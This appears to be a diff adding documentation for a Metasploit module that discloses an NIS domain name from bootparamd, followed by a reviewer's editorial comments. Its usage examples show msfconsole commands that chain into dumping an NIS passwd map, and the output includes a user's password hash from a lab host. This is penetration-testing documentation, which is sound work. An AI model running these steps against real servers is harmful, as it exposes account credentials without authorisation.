|
| 1 | +## Intro |
| 2 | + |
| 3 | +From the `bootparamd(8)` man page: |
| 4 | + |
| 5 | +> bootparamd is a server process that provides information to diskless clients necessary for booting. It consults the /etc/bootparams file to find the information it needs. |
| 6 | +
|
| 7 | +The module documented within will allow a tester to disclose the NIS |
| 8 | +domain name from a server running `bootparamd`. After knowing the domain |
| 9 | +name, the tester can follow up with `auxiliary/gather/nis_ypserv_map` to |
| 10 | +dump a map from an NIS server (running as `ypserv`). |
| 11 | + |
| 12 | +## Setup |
| 13 | + |
| 14 | +Set up NIS as per <https://help.ubuntu.com/community/SettingUpNISHowTo>. |
| 15 | +If the link is down, you can find it via the Wayback Machine. |
| 16 | + |
| 17 | +After that is done, install `bootparamd` however your OS provides it. |
| 18 | + |
| 19 | +Make sure you add a client to the `bootparams` file, which is usually at |
| 20 | +`/etc/bootparams`. The client should be added to `/etc/hosts` if it |
| 21 | +isn't already resolvable. |
| 22 | + |
| 23 | +## Options |
| 24 | + |
| 25 | +**PROTOCOL** |
| 26 | + |
| 27 | +Set this to either TCP or UDP. UDP is the default due to `bootparamd`. |
| 28 | + |
| 29 | +**CLIENT** |
| 30 | + |
| 31 | +Set this to the address of a client in the target's `bootparams` file. |
| 32 | +Usually this is a host within the same network range as the target. |
| 33 | + |
| 34 | +**XDRTimeout** |
| 35 | + |
| 36 | +Set this to the timeout in seconds for XDR decoding of the response. |
| 37 | + |
| 38 | +## Usage |
| 39 | + |
| 40 | +``` |
| 41 | +msf > use auxiliary/gather/nis_bootparamd_domain |
| 42 | +msf auxiliary(gather/nis_bootparamd_domain) > set rhost 192.168.33.10 |
| 43 | +rhost => 192.168.33.10 |
| 44 | +msf auxiliary(gather/nis_bootparamd_domain) > set client 192.168.33.10 |
| 45 | +client => 192.168.33.10 |
| 46 | +msf auxiliary(gather/nis_bootparamd_domain) > run |
| 47 | +
|
| 48 | +[+] 192.168.33.10:111 - NIS domain name for host ubuntu-xenial (192.168.33.10) is gesellschaft |
| 49 | +[*] Auxiliary module execution completed |
| 50 | +msf auxiliary(gather/nis_bootparamd_domain) > |
| 51 | +``` |
| 52 | + |
| 53 | +After disclosing the domain name, you can use |
| 54 | +`auxiliary/gather/nis_ypserv_map` to dump a map from an NIS server. |
| 55 | + |
| 56 | +``` |
| 57 | +msf auxiliary(gather/nis_bootparamd_domain) > use auxiliary/gather/nis_ypserv_map |
| 58 | +msf auxiliary(gather/nis_ypserv_map) > set rhost 192.168.33.10 |
| 59 | +rhost => 192.168.33.10 |
| 60 | +msf auxiliary(gather/nis_ypserv_map) > set domain gesellschaft |
| 61 | +domain => gesellschaft |
| 62 | +msf auxiliary(gather/nis_ypserv_map) > run |
| 63 | +
|
| 64 | +[+] 192.168.33.10:111 - Dumping map passwd.byname on domain gesellschaft: |
| 65 | +list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin |
| 66 | +ubuntu:$6$LXFAVGTO$yiCXi1KjLynOrapuhJE7tKnvdwknDMKiKM7Z8ZB19ht6CHmsS.CbUTm8q0cy5fFHEqA.Sg4Acl.0UtY.Y0JNE1:1000:1000:Ubuntu:/home/ubuntu:/bin/bash |
| 67 | +games:*:5:60:games:/usr/games:/usr/sbin/nologin |
| 68 | +news:*:9:9:news:/var/spool/news:/usr/sbin/nologin |
| 69 | +lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin |
| 70 | +sys:*:3:3:sys:/dev:/usr/sbin/nologin |
| 71 | +backup:*:34:34:backup:/var/backups:/usr/sbin/nologin |
| 72 | +uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin |
| 73 | +systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false |
| 74 | +man:*:6:12:man:/var/cache/man:/usr/sbin/nologin |
| 75 | +bin:*:2:2:bin:/bin:/usr/sbin/nologin |
| 76 | +gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin |
| 77 | +sync:*:4:65534:sync:/bin:/bin/sync |
| 78 | +systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false |
| 79 | +uuidd:*:108:112::/run/uuidd:/bin/false |
| 80 | +dnsmasq:*:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false |
| 81 | +root:*:0:0:root:/root:/bin/bash |
| 82 | +sshd:*:110:65534::/var/run/sshd:/usr/sbin/nologin |
| 83 | +systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false |
| 84 | +irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin |
| 85 | +messagebus:*:107:111::/var/run/dbus:/bin/false |
| 86 | +_apt:*:105:65534::/nonexistent:/bin/false |
| 87 | +mail:*:8:8:mail:/var/mail:/usr/sbin/nologin |
| 88 | +syslog:*:104:108::/home/syslog:/bin/false |
| 89 | +daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin |
| 90 | +systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false |
| 91 | +pollinate:*:111:1::/var/cache/pollinate:/bin/false |
| 92 | +www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin |
| 93 | +proxy:*:13:13:proxy:/bin:/usr/sbin/nologin |
| 94 | +lxd:*:106:65534::/var/lib/lxd/:/bin/false |
| 95 | +
|
| 96 | +[*] Auxiliary module execution completed |
| 97 | +msf auxiliary(gather/nis_ypserv_map) > |
| 98 | +``` |
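Review bot: The Usage example at lines 42-45 sets `client` to the same address as `rhost` (192.168.33.10), but the CLIENT option text at lines 31-32 says it should be "the address of a client in the target's `bootparams` file", usually a separate host in the same network range. Either use a distinct client address in the example or add a sentence to the Setup section saying the test server was registered as its own client in `/etc/bootparams`, so readers know why the two values coincide. Also, line 27 ("UDP is the default due to `bootparamd`") does not say what about `bootparamd` makes UDP the default; state the reason explicitly, e.g. "UDP is the default because `bootparamd` is normally registered over UDP only" or whatever the actual constraint is. Minor: line 7 "The module documented within" reads better as "This module".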